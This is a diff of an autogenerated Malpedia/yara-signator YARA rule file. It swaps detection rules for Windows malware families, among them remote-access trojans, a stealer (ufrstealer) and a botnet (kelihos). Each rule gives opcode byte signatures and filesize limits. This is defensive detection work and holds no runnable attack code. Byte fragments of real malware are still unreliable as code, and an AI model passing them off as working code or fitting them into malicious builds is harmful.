+		$sequence_5 = { f30f6f8610020000 f30f6f8b08020000 660f70c044 660febc1 f30f7f8308020000 0f1006 0f1103 }
+		$sequence_6 = { eb21 4889de 4c8d0531002c00 4889e9 4889f2 e8???????? e9???????? }
+		$sequence_7 = { ff13 e9???????? 4d85f6 7433 498d4c2408 4c89f0 488b4cc1f8 }
+		$sequence_8 = { e8???????? 0f108424e0000000 0f108c24f0000000 0f10942400010000 0f29442450 0f294c2460 0f29542470 }
+		$sequence_9 = { c1eb10 488d8c2490020000 488d94248b030000 41b8f5000000 e8???????? 4c8b442440 4c8b4c2438 }
 
 	condition:
-		7 of them and filesize < 5505024
+		7 of them and filesize < 11247616
 }
-rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
+rule MALPEDIA_Win_Pngdowner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c161add4-90a4-5a07-9de8-bcd8a57e3d69"
+		id = "e2dbfe40-d617-5d1b-bbce-59a19338c6f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newcore_rat_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pngdowner_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "85672d8cf8a6bd59109d6c5a704fff80f074ddc2465adb99808889ae02b39e81"
+		logic_hash = "c7a4cf22317ae6eb6a1b63ad8076fbfd6db12b13640e6a0471f645fcbb28ed9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132229,34 +132107,34 @@ rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b883c200000 52 51 c744241000000000 ff15???????? f7d8 1bc0 }
-		$sequence_1 = { 51 57 6a01 53 52 55 ff15???????? }
-		$sequence_2 = { c686c800000043 c6864b01000043 c7466878920310 6a0d e8???????? 59 8365fc00 }
-		$sequence_3 = { 0f8788000000 0fb69028720010 ff249508720010 33c0 83c40c c3 8b4644 }
-		$sequence_4 = { 57 8b78f4 894dfc 85db }
-		$sequence_5 = { 0430 0fb64c2426 8844242f 8bc1 c1e804 83f809 }
-		$sequence_6 = { 8984242c040000 8b842434040000 53 55 56 57 8bf1 }
-		$sequence_7 = { 81ec54020000 a1???????? 33c4 8984244c020000 8b842458020000 55 }
-		$sequence_8 = { b903000000 668994249c000000 668984249e000000 66898c24a0000000 ba01000000 66899424a2000000 b809000000 }
-		$sequence_9 = { e9???????? 8b442410 6a04 56 50 8bde c744242400000000 }
+		$sequence_0 = { 83c410 85c0 0f856d010000 8d842418020000 8d8c2498010000 50 }
+		$sequence_1 = { b910270000 f7f9 52 68???????? 8d942424010000 }
+		$sequence_2 = { 83f85a 7714 8088????????10 8ac8 80c120 888800e44000 }
+		$sequence_3 = { b910270000 f7f9 52 68???????? }
+		$sequence_4 = { 83c8ff eb1f 8bce 83e61f c1f905 8bc6 8b0c8d40e64000 }
+		$sequence_5 = { 99 b910270000 f7f9 8d84241c010000 }
+		$sequence_6 = { e8???????? 85ff 0f85cf000000 53 8b5c2428 55 }
+		$sequence_7 = { 8d7c2420 8d542420 f3ab 8d4c2414 51 6800000100 }
+		$sequence_8 = { 50 89542414 c644240d73 ff15???????? 85c0 7430 68???????? }
+		$sequence_9 = { 0f84e9000000 8b7508 8b7d0c 8d0520e34000 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Agent_Btz_Auto : FILE
+rule MALPEDIA_Win_Ufrstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63f52dc6-c77d-5450-96ef-d9bb7ca2e2e5"
+		id = "ba013c32-c7d7-5540-a7af-23c784527e98"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agent_btz_auto.yar#L1-L502"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ufrstealer_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "490f9b875f186054dd3eafec04e94807f52eca52fbc5563b2ddd7496752d38c8"
+		logic_hash = "5a74533151b417ab8386a9dc0bd4bcb97ff632563f715bef9c755e4394a3e888"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132268,81 +132146,32 @@ rule MALPEDIA_Win_Agent_Btz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ffd6 8d54240c 52 ffd7 }
-		$sequence_1 = { c74608ffffffff f644240801 7409 56 }
-		$sequence_2 = { 50 ffd3 85c0 75d8 5f 5e 5b }
-		$sequence_3 = { c706???????? c7460c00000000 895e08 895e04 c7461000000000 895e14 }
-		$sequence_4 = { ff15???????? b804000f00 8b4df4 64890d00000000 5f 5e 5b }
-		$sequence_5 = { 56 6a00 68???????? 8935???????? e8???????? }
-		$sequence_6 = { 6a00 50 ff15???????? 894614 33c0 }
-		$sequence_7 = { 740e 50 ff15???????? c74608ffffffff f644240801 }
-		$sequence_8 = { 8d542408 52 c744240c30000000 c744241003000000 }
-		$sequence_9 = { 8bf1 8b4608 c706???????? 85c0 7413 83f8ff 740e }
-		$sequence_10 = { 6801010000 ff15???????? 85c0 7415 }
-		$sequence_11 = { 6a0a 68???????? 6a01 6a00 68???????? }
-		$sequence_12 = { 51 6a00 6819000200 6a00 68???????? }
-		$sequence_13 = { 50 68???????? 6a01 68???????? e8???????? 83c410 }
-		$sequence_14 = { 6a01 6a04 6a01 68???????? }
-		$sequence_15 = { 50 e8???????? 83c408 6800010000 e8???????? }
-		$sequence_16 = { 6a01 68???????? e8???????? 83c414 5f 5e 5b }
-		$sequence_17 = { 89461c 3dea000000 740b 3de5030000 }
-		$sequence_18 = { 7511 e8???????? 83c020 50 }
-		$sequence_19 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca }
-		$sequence_20 = { 83c020 50 e8???????? 83c404 33c0 }
-		$sequence_21 = { 68???????? 6a01 e8???????? 50 e8???????? 83c41c }
-		$sequence_22 = { 740d 3cff 7409 f6d0 }
-		$sequence_23 = { c684249200000065 c684249300000073 c684249400000073 c684249500000057 }
-		$sequence_24 = { 33c9 ff542458 85c0 7420 }
-		$sequence_25 = { c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f }
-		$sequence_26 = { 57 ff7508 8bf1 33db 895e10 }
-		$sequence_27 = { 6808020000 50 668945fa 8d85d8fdffff }
-		$sequence_28 = { 33ff 8d85f8f7ffff 57 50 }
-		$sequence_29 = { 6a00 6a27 6a02 6a00 6a01 }
-		$sequence_30 = { 8b85f8feffff 53 8d8df4feffff 51 8d8df8feffff }
-		$sequence_31 = { ff9574ffffff 8b4de0 89410c 33c0 8be5 5d c20400 }
-		$sequence_32 = { c684249500000057 c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c }
-		$sequence_33 = { 50 8d85e8fdffff 50 c745fc04010000 }
-		$sequence_34 = { c684248f00000072 c68424900000006f c684249100000063 c684249200000065 }
-		$sequence_35 = { 50 8945f8 33ff 8d85f8f7ffff }
-		$sequence_36 = { 8bc8 66894de0 66894de2 59 6a70 }
-		$sequence_37 = { 8d8505feffff 50 e8???????? 83c40c }
-		$sequence_38 = { c645d316 c645d43a c645d53b c645d63b c645d730 }
-		$sequence_39 = { 488b4338 33d2 488bce 448d4220 }
-		$sequence_40 = { 488b4b38 ff5160 894330 3dea000000 }
-		$sequence_41 = { 488b0e 48894628 488b4638 4c8d4c2450 448bc3 }
-		$sequence_42 = { 488b07 896830 33c0 488b5c2458 488b6c2460 488b742468 4883c440 }
-		$sequence_43 = { 488b0f 894130 eb06 488b07 896830 33c0 }
-		$sequence_44 = { 83c904 c1e803 448bc9 440fafc8 }
-		$sequence_45 = { 488b4638 488b0e 4c8d442450 4533c9 }
-		$sequence_46 = { 488b4638 ff5060 894630 3de5030000 }
-		$sequence_47 = { 488bcf c744242088130000 e8???????? 488b5738 }
-		$sequence_48 = { 488b0f 488901 488b07 488338ff }
-		$sequence_49 = { 488b0f 48894108 488b0f 488b4108 48894128 488b0f }
-		$sequence_50 = { 85db 7415 4c8b4f38 488d4804 }
-		$sequence_51 = { 8d8594faffff 50 68???????? ff15???????? }
-		$sequence_52 = { 742e f7460800000080 7405 83c60c }
-		$sequence_53 = { 72e3 8b2d???????? 8d442420 50 ffd5 }
-		$sequence_54 = { 57 33db 8d84248c000000 6a3c 53 }
-		$sequence_55 = { 85ed 7506 8b4204 8b680c b86e6b0000 66394504 0f856e010000 }
-		$sequence_56 = { 8b4604 3938 747b 8b33 57 }
-		$sequence_57 = { 5e 59 c3 68???????? e8???????? 59 b815000040 }
-		$sequence_58 = { ff74241c ffd3 837c241000 740a }
+		$sequence_0 = { 8955f4 3b55f0 0f82ddfcffff 68???????? e8???????? 68???????? }
+		$sequence_1 = { 72f2 eb1e 8b75e8 46 }
+		$sequence_2 = { ff35???????? ff15???????? 8bd8 ff75fc ff7608 53 ff15???????? }
+		$sequence_3 = { 83c304 ebb2 c705????????66666666 6a04 68???????? e8???????? }
+		$sequence_4 = { 85c0 7548 803d????????00 7411 6a00 68???????? ff15???????? }
+		$sequence_5 = { 6800040000 ff7510 6aff ff7204 6a00 6a00 ff15???????? }
+		$sequence_6 = { 8945ec ff75f0 ff15???????? 50 6a06 ff75f0 }
+		$sequence_7 = { 6801000080 ff15???????? 85c0 0f85fc030000 68000000f0 6a01 6a00 }
+		$sequence_8 = { e8???????? 85c0 0f846c020000 83c00a }
+		$sequence_9 = { a1???????? 0305???????? c60000 68???????? ff35???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 5577728
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Tonedeaf_Auto : FILE
+rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45b13e7e-c29b-5480-ade9-d6d61b9a86df"
+		id = "25fa3485-ffb3-5411-9ac6-ae7f05225e3c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tonedeaf_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghost_secret_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ffe23054663c8cef941b8fef13d66b93a10d69fedb5bcac05b4afd2fa9414e88"
+		logic_hash = "80ab2d045d82b27f499fbd18dbe91dc4f32ae725e1e1075459fc83c90e8a3488"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132356,32 +132185,32 @@ rule MALPEDIA_Win_Tonedeaf_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45ec 85c0 740b 6a08 50 }
-		$sequence_1 = { 2bd9 2bf1 8bc3 46 }
-		$sequence_2 = { 33c0 660fd645d4 33db 8945d8 }
-		$sequence_3 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 }
-		$sequence_4 = { 6a00 ff15???????? 56 ff15???????? 56 ff15???????? }
-		$sequence_5 = { 75f3 8bf3 8a03 43 84c0 }
-		$sequence_6 = { 33c0 660fd645d4 33db 8945d8 895dd4 }
-		$sequence_7 = { 75f3 8bf3 8a03 43 84c0 75f9 2bde }
-		$sequence_8 = { c745dc00000000 33c0 660fd645d4 33db 8945d8 895dd4 }
-		$sequence_9 = { 8a0e 8d7601 884c32ff 84c9 75f3 8bf3 8a03 }
+		$sequence_0 = { e8???????? 83c408 50 56 ff15???????? 8d8c24a4050000 6a13 }
+		$sequence_1 = { c68424eb02000040 c68424ec02000017 c68424ed02000034 c68424ee020000da c68424ef020000f8 c68424f002000003 c68424f1020000c7 }
+		$sequence_2 = { 85c0 55 7518 68beb60000 e8???????? 83c408 5f }
+		$sequence_3 = { c68424c8070000a6 c68424c9070000c9 c68424ca0700004e c68424cb07000072 c68424cc07000008 c68424cd070000dc c68424ce0700007b }
+		$sequence_4 = { 6689442460 50 8b44247c c744242400000000 50 6a00 }
+		$sequence_5 = { c684243e04000031 c684243f040000cb c68424400400006c c68424410400006c c684244204000075 }
+		$sequence_6 = { 8d54244c 57 52 50 ff15???????? 85c0 }
+		$sequence_7 = { 75dc 5f 5e 5d b890f0ffff 5b c3 }
+		$sequence_8 = { c68424b7070000d1 c68424b40400004b 888c24b5040000 c68424b60400007e c68424b704000049 c68424b80400006e c68424b904000070 }
+		$sequence_9 = { 8b440e08 83f809 0f87cf000000 ff248520ae4000 6a07 8d542444 e9???????? }
 
 	condition:
-		7 of them and filesize < 851968
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Strikesuit_Gift_Auto : FILE
+rule MALPEDIA_Win_Grimplant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "07a5f9ca-40c1-5bef-81cd-9b2edfb79941"
+		id = "f4355e5f-8d8e-5a41-aaf8-ff78dc5bf245"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strikesuit_gift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strikesuit_gift_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grimplant_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "38158a27b97c948ddd0e7a00ce8b9fd84a0eeadae064b8c5755cc04130a6bdf7"
+		logic_hash = "4dec16f667070add3c068beb4323237f7a05d78d34df766eafa3cbe4813f7400"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132395,32 +132224,32 @@ rule MALPEDIA_Win_Strikesuit_Gift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 06 2000100000 1f40 2801000006 }
-		$sequence_1 = { 7245000070 7e1b00000a 6f2500000a 1305 1105 7249000070 }
-		$sequence_2 = { 2d3f 08 8e 69 05 59 }
-		$sequence_3 = { 2801000006 0b 16 0c 2b0e 07 08 }
-		$sequence_4 = { 7503000002 0d 09 7e1e00000a 6f0c000006 }
-		$sequence_5 = { a2 1105 17 58 1305 1105 08 }
-		$sequence_6 = { 07 d003000002 282000000a 282100000a }
-		$sequence_7 = { 1107 7e01000004 1b 6f1800000a }
-		$sequence_8 = { 731500000a 0b 16 0c }
-		$sequence_9 = { 03 282c00000a 0a 16 0b 2b19 02 }
+		$sequence_0 = { eb13 4889c3 4889f0 e8???????? 488b942480000000 84c0 742a }
+		$sequence_1 = { eb09 488d7908 e8???????? 488b6c2420 4883c428 c3 0f1f4000 }
+		$sequence_2 = { e8???????? 488d056e852500 488b5c2428 488b4c2448 488b7c2450 e8???????? 48c7400801000000 }
+		$sequence_3 = { e8???????? 4889d8 e8???????? 4c89e0 0f1f440000 e8???????? 488b9424f8000000 }
+		$sequence_4 = { 4c8b442458 4c8b4c2460 4c8d15f1213300 4989c3 4889c8 4889d1 488bac24a0000000 }
+		$sequence_5 = { eb1c 488b4c2460 488b8908010000 488b442468 ffd1 3c03 7505 }
+		$sequence_6 = { 8400 833d????????00 750c 488d0da5553c00 488908 eb0f 4889c7 }
+		$sequence_7 = { c3 4889d0 488b5c2468 488b4c2440 488d3dd7323800 be04000000 e8???????? }
+		$sequence_8 = { bf01000000 4889fe e8???????? 0f1f440000 e8???????? 4889c3 488d05f1d22a00 }
+		$sequence_9 = { ffd2 488d48ff eb15 31c0 488b6c2468 4883c470 c3 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 19940352
 }
-rule MALPEDIA_Win_Mewsei_Auto : FILE
+rule MALPEDIA_Win_Reactorbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "add045ad-b22b-5690-8008-c500cb8eb696"
+		id = "1f9dea8e-61fb-5c9c-9443-ee6383884e21"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mewsei_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reactorbot_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "25d3161d5bf746c6ecd7f709f19943bce6135e5cdd1b0f6ec1d26ee45065cb61"
+		logic_hash = "701fb8c7491a0d723c5845d4d6cce6ffa47155dd0df2cecad8bd6a0e42ab031b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132434,71 +132263,77 @@ rule MALPEDIA_Win_Mewsei_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 037dfc 897df0 0fb6780b c1e708 }
-		$sequence_1 = { c1e708 0fb6582c 0bfb 89b984000000 897dbc 8b7df0 337dfc }
-		$sequence_2 = { 03de 8dbc3b56b7c7e8 0fb6580a c1c70c 037dfc 897df0 0fb6780b }
-		$sequence_3 = { 0f8278ffffff 5b 5f 8bc6 5e }
-		$sequence_4 = { 3bcf 7319 bf???????? 8d5101 2bf9 }
-		$sequence_5 = { c3 8b4d0c 85c9 7411 8bc1 }
-		$sequence_6 = { 6a00 50 68???????? 6a00 6a00 ffd6 50 }
-		$sequence_7 = { 8b08 8b511c 50 ffd2 3bc3 740a 83f801 }
-		$sequence_8 = { 33d2 25ff7f0000 f7f1 80c230 885305 c6430600 85ff }
-		$sequence_9 = { c1ea10 884708 8b4610 884f05 885706 8bc8 8bd0 }
+		$sequence_0 = { 8b4804 894dfc 8b55fc a1???????? }
+		$sequence_1 = { c745e400000000 a1???????? 8945e0 8b4d08 }
+		$sequence_2 = { 50 ff15???????? 8b55f4 52 ff15???????? 8b45ec 8be5 }
+		$sequence_3 = { ff15???????? 8945f8 837df800 7449 8b55fc 52 }
+		$sequence_4 = { 8d8590fdffff 50 ff15???????? 8d8d90fdffff 51 }
+		$sequence_5 = { 8d9580f9ffff 52 ff15???????? 8945ec 837decff }
+		$sequence_6 = { a1???????? 8982b8000000 83c8ff 8be5 }
+		$sequence_7 = { 8b4508 50 6804010000 8d8d78f7ffff 51 e8???????? 8d9578f7ffff }
+		$sequence_8 = { 7402 eb0c c705????????b80b0000 eb0a c705????????e8030000 }
+		$sequence_9 = { ff15???????? e8???????? 833d????????00 7509 833d????????00 }
+		$sequence_10 = { 83c005 99 b905000000 f7f9 }
+		$sequence_11 = { 69c0b13a0200 99 83e203 03c2 }
+		$sequence_12 = { 6bc005 83e803 99 b999000000 f7f9 }
+		$sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 }
+		$sequence_14 = { 837c246000 0f8562010000 c744245400000000 c744247400100000 }
+		$sequence_15 = { 48837c245000 0f8417040000 4c8d0da2b30000 41b804000000 488d15ed7e0000 488b4c2450 }
 
 	condition:
-		7 of them and filesize < 504832
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Unidentified_061_Auto : FILE
+rule MALPEDIA_Win_Octowave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59888b60-a3e6-5e9f-a441-429646fe0731"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_061_auto.yar#L1-L123"
+		id = "35c13348-0eb4-5d13-a207-5c2013e4210f"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.octowave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.octowave_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d"
+		logic_hash = "1fa979b8176587b51d4501d3bbb1e6a1953eac27bc34cded0325574b49761409"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85d4fdffff 50 e8???????? c9 }
-		$sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc }
-		$sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? }
-		$sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee }
-		$sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 }
-		$sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 }
-		$sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 }
-		$sequence_7 = { 53 57 6a04 33ff 33db }
-		$sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? }
-		$sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 }
+		$sequence_0 = { fecb 889c24c0000000 8b9c244c010000 85db 7529 8d9c242c010000 8d7b01 }
+		$sequence_1 = { ff86201b0000 8b86201b0000 c684302013000000 83ef01 75d3 8b5c2414 85d2 }
+		$sequence_2 = { ff742450 56 e8???????? 83c408 85c0 0f850a040000 83cb10 }
+		$sequence_3 = { 8d4f02 51 56 e8???????? 83c408 5f 8bc6 }
+		$sequence_4 = { ff742418 2bf5 ff742424 8b04b568022110 ffd0 8b7c241c 83c40c }
+		$sequence_5 = { ff7500 50 e8???????? 83c408 837db800 750a f30f1015???????? }
+		$sequence_6 = { f30f5cc8 f30f1041e8 f30f594714 f30f5cc8 f30f1041e4 f30f594718 f30f5cc8 }
+		$sequence_7 = { f76b14 03f8 8b4560 13ca f76b18 03f8 8b455c }
+		$sequence_8 = { ff5004 48 8bcf 50 ff560c 8b17 8bcf }
+		$sequence_9 = { ff74241c 8b4608 8b4e04 48 f20f1044242c 23c2 6a00 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 7258112
 }
-rule MALPEDIA_Win_Poldat_Auto : FILE
+rule MALPEDIA_Win_Kelihos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42cee7c4-4091-565d-9c3d-72814a243e33"
+		id = "5ce7cec0-9b63-57ad-afe3-2ac567126cba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poldat_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kelihos_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "623b16e441bfe440967c1ef70315e2275e1dcbf3de26c2e6e7dae46aecf0c483"
+		logic_hash = "c2eacbb99d14be28a148d8ab81d8255fe39a06721e8fc3e2b106469f00f3e62c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132512,32 +132347,32 @@ rule MALPEDIA_Win_Poldat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4514 83c410 8906 8b4510 }
-		$sequence_1 = { c74724c0324000 8b4c2418 83f9ff 750c c744241806000000 8b4c2418 }
-		$sequence_2 = { 89be4c0c0000 89be500c0000 89be540c0000 8bc6 5f }
-		$sequence_3 = { 8b4720 895718 3bc2 750a c74720a0324000 }
-		$sequence_4 = { 8d888c000000 8d9080090000 8988100b0000 8d88740a0000 8988280b0000 33c9 c780180b000018b24100 }
-		$sequence_5 = { 50 e8???????? 55 8d86bc0a0000 57 50 c786b80a0000901f0000 }
-		$sequence_6 = { 8bc7 83e007 83ed03 8b148dbc9c4100 }
-		$sequence_7 = { c3 55 8bec 81ec68040000 8065fc00 53 56 }
-		$sequence_8 = { 2bc8 03c7 51 6a00 8d441804 50 }
-		$sequence_9 = { 50 e8???????? 59 e8???????? 6a04 99 }
+		$sequence_0 = { e9???????? 6a01 6a08 e8???????? 6a03 53 53 }
+		$sequence_1 = { e8???????? 8bf3 8d5c1b02 3b5d0c 7cb6 7526 8b450c }
+		$sequence_2 = { 8d8c24ac000000 8844241b e8???????? 85c0 743a 385c2417 7534 }
+		$sequence_3 = { c3 837c2404ff 750e 817c2408ffffff7f 7504 33c0 40 }
+		$sequence_4 = { c60060 e8???????? 6a5c 8bce c60064 e8???????? 68c5010000 }
+		$sequence_5 = { eb02 33c0 57 50 ff742418 ff742420 ff74241c }
+		$sequence_6 = { c3 56 8bf1 6a00 6a01 8d4e7c c706???????? }
+		$sequence_7 = { e9???????? e8???????? 8b00 50 e8???????? 83c404 50 }
+		$sequence_8 = { c6400d00 8908 eb06 8b4508 832000 e8???????? c20c00 }
+		$sequence_9 = { c1e108 034df0 8d4514 e8???????? 834dfcff 8d4514 50 }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 4702208
 }
-rule MALPEDIA_Win_Quirkyloader_Auto : FILE
+rule MALPEDIA_Win_Bluehaze_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96ed682d-1f85-55be-b220-303838180cde"
+		id = "1fd1249e-5be9-518c-b471-fb529bb8c9ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quirkyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quirkyloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluehaze_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "8925860198d03a19b550d761a81339280161301cb85fe60c28e452df7f2a68e4"
+		logic_hash = "09fb1421d27d0a64efc13cfb683dac14a3c5bd0c2192d0b84f6a45513276dafa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132551,32 +132386,32 @@ rule MALPEDIA_Win_Quirkyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488bd8 488d15636d1200 488d4b10 41b880000000 e8???????? 488d4e10 }
-		$sequence_1 = { e8???????? 85c0 740e b801000000 4883c438 5b 5e }
-		$sequence_2 = { 4c8d8c2488000000 488bcb 4533c0 e8???????? 4c8bf8 4c8b6b40 4d85ff }
-		$sequence_3 = { e8???????? 498bcd e8???????? 488d0d0a1a0300 e8???????? 488bd8 e8???????? }
-		$sequence_4 = { 8b7a04 49033f 4803f9 4803fb 483bdf 731f 488b0b }
-		$sequence_5 = { ffc8 488d1480 498b4230 488d0cd0 488b4110 49894110 49c741f801000000 }
-		$sequence_6 = { 80b9b901000000 7502 eb15 488bce e8???????? 488bc8 33d2 }
-		$sequence_7 = { eb02 8bc6 8945cc 488b4518 488b4818 48898d70ffffff 488b4518 }
-		$sequence_8 = { f7da 41b9ff000000 83e207 0fb6ca 488d95c0000000 62d17e486f00 62f17e487f4502 }
-		$sequence_9 = { e8???????? 488bc3 8138ffffff7f 7409 488bc3 8b00 ffc0 }
+		$sequence_0 = { 85ff 7405 8b4dec 890f 83c704 897dd8 3b5604 }
